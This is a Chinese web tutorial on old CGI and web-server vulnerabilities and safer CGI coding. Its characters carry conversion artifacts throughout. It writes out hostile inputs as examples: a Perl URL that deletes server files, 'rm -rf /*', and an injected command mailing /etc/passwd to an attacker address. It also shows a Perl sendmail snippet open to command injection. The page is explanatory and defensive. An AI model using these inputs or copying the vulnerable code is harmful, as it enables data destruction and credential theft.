學(xué)習(xí)啦 > 學(xué)習(xí)電腦 > 電腦安全 > 防火墻知識(shí) > Web安全技術(shù)與防火墻

Web安全技術(shù)與防火墻

時(shí)間: 林澤1002 分享

Web安全技術(shù)與防火墻

  計(jì)算機(jī)的安全性歷來(lái)都是人們討論的主要話題之一。而計(jì)算機(jī)安全 主要研 究的是計(jì)算機(jī)病毒的防治和系統(tǒng)的安全。下面是學(xué)習(xí)啦小編跟大家分享的是Web安全技術(shù)與防火墻,歡迎大家來(lái)閱讀學(xué)習(xí)。

  Web安全技術(shù)與防火墻

  步驟/方法

  Perl解釋器的漏洞

  Netscape Communications Server中無(wú)法識(shí)別cgi-bin下的擴(kuò)展名 及其應(yīng) 用關(guān)系,如:.pl是PERL的代碼程序自動(dòng)調(diào)用 perl.exe文件解 釋,即使現(xiàn)在也只 能把perl.exe文件存放在cgi-bin目錄之下。執(zhí)行 如: /cgi-bin/perl.exe?&my_script.pl. 但是這就給任何人都有執(zhí)行 perl 的可能, 當(dāng)有些人在其瀏覽器的URL中加上如: /cgi-bin/perl.exe?&-e+unlink+%3C*%3E 時(shí),有可能造成刪除服務(wù)器當(dāng) 前目錄下文件的危險(xiǎn)。但是,其他如:O'Reilly WebSite或Purveyor都 不存在這種漏洞。

  〖2〗CGI執(zhí)行批處理文件的漏洞

  文件名:test.bat:

  @echo off

  echo Content-type: text/plain

  echo

  echo Hello World!

  如果客戶瀏覽器的URL為:/cgi-bin/test.bat?&dir則執(zhí)行調(diào)用命 令解釋 器完成dir列表。這給訪問(wèn)者有執(zhí)行其他命令可能性。

  2)O'Reilly WebSite server for Windows NT/95

  在WebSite1.1B以前的版本中使用配處理文件存在著Netscape同樣 的漏洞, 但是,新版關(guān)閉.bat在cgi中的作用。支持perl,VB和C作為CGI 開發(fā)工具。至于 他的安全問(wèn)題參看: http://website.ora.com/devcomer/secalert1。

  3)Microsoft's IIS Web Server

  在96年3月5日前的IIS在NT下的.bat CGI的 bug甚至比其他更嚴(yán) 重,可以 任意使用command命令。但之后修補(bǔ)該漏洞。你可檢查你的可 執(zhí)行文件的建立日 期。IIS3.0還存在一些安全bug,主要是cgi-bin下的 覆給權(quán)利。

  另外,許多 WEB服務(wù)器本身都存在一些安全上的漏洞,都是在版本 升級(jí)過(guò) 程不斷更新。在這就不一一列舉。

  從CGI編程角度考慮安全:

  1〕采用編譯語(yǔ)言比解釋語(yǔ)言會(huì)更安全些,并且 CGI程序應(yīng)放在獨(dú) 立于HTML 存放目錄之外的CGI-BIN下,是為了防止一些非法訪問(wèn)者從瀏覽 器端取得解釋性語(yǔ) 言的原代碼后從中尋找漏洞。

  2〕在用C來(lái)編寫CGI程序時(shí)盡量少用popen(), system()和所有涉 及/bin/sh 的shell命令。在Perl中system(), exec(), open(),eval() 等exec或eval之類命 令。在由用戶填寫的form還回cgi時(shí),不要直接調(diào) 用system()之類函數(shù)。這是為避 免當(dāng)填寫內(nèi)容為“rm -rf /*”或 “/usr/lib/sendmail nobody@nowhere.com; mail badguys@hell.org< /etc/passwd”之類內(nèi)容。

  3〕用Perl編寫CGI時(shí)如:

  $mail_to = &get_name_from_input;

  open (MAIL,"| /usr/lib/sendmail $mail_to");

  print MAIL "To: $mailto\nFrom: me\n\nHi there!\n";

  close MAIL;

  該小程序是把客戶瀏覽器的form到服務(wù)器的mail處理程序。

Web安全技術(shù)與防火墻相關(guān)文章:

1.為什么要使用web防火墻

2.常用網(wǎng)絡(luò)安全技術(shù)有哪些

3.web應(yīng)用防火墻和傳統(tǒng)防火墻的區(qū)別

4.web防火墻功能有哪些呢

5.防火墻到底有沒(méi)有用

6.WEB應(yīng)用防火墻的相關(guān)介紹

2822875